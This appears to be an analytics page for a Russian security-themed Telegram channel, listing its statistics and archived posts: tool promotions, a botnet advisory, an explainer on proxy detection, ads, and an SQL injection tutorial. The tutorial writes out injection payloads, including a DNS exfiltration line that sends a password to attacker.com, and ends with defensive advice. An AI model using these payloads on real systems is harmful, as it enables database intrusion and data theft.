CodeGuard: CyberSec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: CyberSec Edition 的分析概览
频道 CodeGuard: CyberSec Edition 是活跃参与者。目前社区聚集了 13 288 名订阅者,在 技术与应用 类别中位列第 9 286,并在 俄罗斯 地区排名第 48 736 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 13 288 名订阅者。
根据 31 八月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 225,过去 24 小时变化为 -6,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 11.39%。内容发布后 24 小时内通常能获得 5.57% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 514 次浏览,首日通常累积 741 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 6。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 01 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
13 288
订阅者
-624 小时
+27 天
+22530 天
帖子存档
👍 Вот оно и случилось... мы выпустили ролик на ютуб
Вместе с каналом «Карманный хакер» разобрали сетевую базу, без которой сложно двигаться в ИБ.
📱 Смотреть ролик
https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms https://youtu.be/_zDkGX87Rms
С любовью
CodeGuard: PySec Edition | Карманный хакер
🛡 PatchMon: централизованное управление обновлениями в серверных средах
Инструмент для админов и Blue Team, который позволяет безопасно и централизованно управлять обновлениями на разных серверах. Агенты обмениваются данными с сервером PatchMon только по исходящим каналам — не нужно открывать порты и рисковать.
Что умеет:
Централизованное управление патчами на множестве серверов
Агенты работают через исходящие соединения (без открытых портов)
Полная видимость состояния обновлений
Безопасная автоматизация процессов🔗 GitHub: PatchMon/PatchMon 😈 CodeGuard: PySec Edition | Чат
⚡️ Новое обновление Telegram!
Теперь наш бизнес-бот работает БЕЗ Telegram Premium
С ним ты сможешь:
• Сохранять одноразовые фотографии • Смотреть удаленные сообщения • Общаться с ИИ прямо в Telegram— И это абсолютно бесплатно Ничего скачивать не нужно, просто запусти: @enterMOD_bot
🚨Ключевая информация об угрозе.
Ботнет RondoDox активно использует критическую уязвимость React2Shell (CVE-2025-55182, CVSS: 10.0) для взлома серверов Next.js и IoT-устройств. Цель — установка майнеров криптовалют и создание ботнета для DDoS-атак.
Важно: уязвимость касается React/Next.js, а не Microsoft Exchange, как было упомянуто ранее.
🛡 Что делать?
Срочно обновить Next.js до патченной версии.
Изолировать IoT-устройства в отдельные VLAN.
Установить WAF (брандмауэр веб-приложений).
Мониторить запуск подозрительных процессов.
Блокировать известные C2-серверы.😈 CodeGuard: PySec Edition | Чат
👨💻Хочешь расти в IT, но некогда читать простыни текста?
Lab IT — короткие разборы, полезные приёмы и понятные объяснения.
Всё для тех, кто работает в IT прямо сейчас.
➡️ https://t.me/+ZUhr3zFZWk9mY2My
🌍 OSINT International: гигантская коллекция ссылок по 50+ странам мира
Сборник ресурсов для OSINT-исследований, где собраны карты, реестры, базы данных и полезные ссылки по множеству стран. Всё в одном месте, разбито по странам.
Что внутри:
Карты — топографические, спутниковые, исторические, кадастровые
Реестры — юридические лица, недвижимость, судебные дела, патенты
СМИ и соцсети — локальные новостные ресурсы, поиск по людям
Госструктуры — сайты министерств, ведомств, открытые данные
Статистика — демография, экономика, транспорт, инфраструктура🔗 Ссылка: OSINT International 😈 CodeGuard: PySec Edition | Чат
📘 DevOps-инженер: от основ до продакшена — новый курс на Mentorix
Пишете код, но деплой и прод — чёрный ящик? Курс про инженерию эксплуатации: от первого сервера до автоматизированной CI/CD-инфраструктуры, которая держит нагрузку и не падает.
⚙️ Стек: Docker, Kubernetes, Ansible, Terraform, CI/CD, Prometheus + Grafana, логи ELK
🧩 Задания с автопроверкой + лабы в настоящем терминале
💻 Финальный проект в портфолио
🎓 Сертификат · доступ навсегда
🏷 −35% по промокоду DEVOPS35 — только 48 часов
13 990 ₽ → 9 094 ₽
➜ Забрать курс со скидкой
━━━━━━━━━━━━━━
🎁 А ещё на платформе — бесплатные курсы:
Языки программирования
⚡ Golang — основы языка
🦀 Rust — основы языка
🐍 Основы Python
Инфраструктура и DevOps
🖥 Основы DevOps
🐳 Docker: первые шаги
🔧 Git для начинающих
Базы данных
• SQL с нуля
• MongoDB с нуля
📚 Все бесплатные курсы Mentorix
Привет. Вот тебе самые топовые каналы по IT!
⚙️ Dev Boost — Самая огромная коллекция платных курсов, которые можно скачать бесплатно;
👩💻 IT Books — Самая огромная библиотека книг;
💻 Hacking & InfoSec Base — Крутой блог белого хакера;
🛡 CyberGuard — Всё про ИБ;
🤔 ИБ Вакансии — Всё, чтобы найти работу в ИБ;
👩💻 linux administration — Всё про Линукс;
📲 В Max тоже есть место для линуксоидов;
👩💻 Программистика — Python, python и ещё раз python;
👩💻 GameDev Base — Всё про GameDev;
😆 //code — Самые топовые мемы по IT:
📲 Мы в Max;
Подпишись, чтобы не потерять!
🛡 Как ТСПУ ловит VLESS в 2026 и почему XHTTP — следующий шаг
Статья разбирает методы детекции, которые работают прямо сейчас. Если ваш VLESS+Reality сервер лёг в последние месяцы — вы не один. В сообществах фиксируют волны блокировок, которые раньше не достигали хорошо настроенных Reality-серверов.
Как ТСПУ видят VLESS:
JA3/JA4-отпечатки — TLS-рукопожатие имеет уникальные характеристики, которые можно детектировать
Поведенческий анализ — даже при шифровании, паттерны трафика (размер пакетов, тайминги) могут выдать прокси
Сертификаты — даже если они "поддельные", методы анализа становятся умнееXHTTP — что это:
Новая транспортная обёртка, маскирующая прокси-трафик под обычный HTTP/3
Использует QUIC, который сложнее анализировать
Разработан для противодействия именно поведенческому анализу➡️ Полная статья 😈 CodeGuard: PySec Edition | Чат
💡 SQL-инъекция: От UNION до кражи данных через DNS
Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак.
🔍 1. UNION-based — когда результат виден
Работает, если данные из запроса выводятся на страницу (список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат.
' UNION SELECT username, password FROM users--
Суть: Крадём данные напрямую из интерфейса.
🎭 2. Blind (Слепая) — когда результат не виден
Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет":
' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'--
Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли.
⏱️ 3. Time-based — слепая, но с таймером
Разновидность слепой, где ответ — это задержка.
' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)--
Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали.
🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход
Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос.
sql
' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')--
Как работает:
СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test.
Для этого она делает DNS-запрос к домену attacker.com.
В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com.
Данные украдены.💎 Итог:
UNION — если виден вывод.
Blind — если есть косвенная реакция.
DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос.
Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS.😈 CodeGuard: PySec Edition | Чат
☁️ Moltworker: запустите Moltbot в облаке Cloudflare без лишнего железа
Если у вас нет мощного ПК для локального запуска ИИ-ассистента, теперь есть решение. Moltworker разворачивает Moltbot прямо в облаке Cloudflare — всегда доступен, стабилен, не требует от вас никаких серверов.
Что это даёт:
Работает 24/7 без вашего вмешательства
Не нужно покупать железо
Использует инфраструктуру Cloudflare Workers🔗 GitHub: Moltworker 😈 CodeGuard: PySec Edition | Чат
🌑 Robin: ИИ-инструмент для поиска в даркнете
Вместо ручного поиска по .onion-сайтам Robin сам формулирует запросы и собирает данные из открытых источников даркнета.
Что умеет:
Автоматический поиск по даркнет-ресурсам
Генерация запросов через ИИ
Работа через командную строку
Лёгкая настройка🔗 GitHub: Robin 😈 CodeGuard: PySec Edition | Чат
Ваш пароль почти наверняка уже утёк. Вопрос только в том, подходит ли он к остальным вашим аккаунтам.
Базы с почтами и паролями утекают каждую неделю. Дальше работает робот: берёт вашу пару «почта + пароль» и пробует её везде — от маркетплейсов до Госуслуг.
СУРОК Safe — российский менеджер паролей: генерирует надёжные пароли, хранит их зашифрованными. Работает в браузере, на телефоне и на компьютере. Серверы в России, оплата нашей картой.
Помнить нужно один пароль. Остальные пусть помнит сурок
👉 https://tglink.io/afdba1222b8847?erid=2W5zFHZ9eaMtelegain
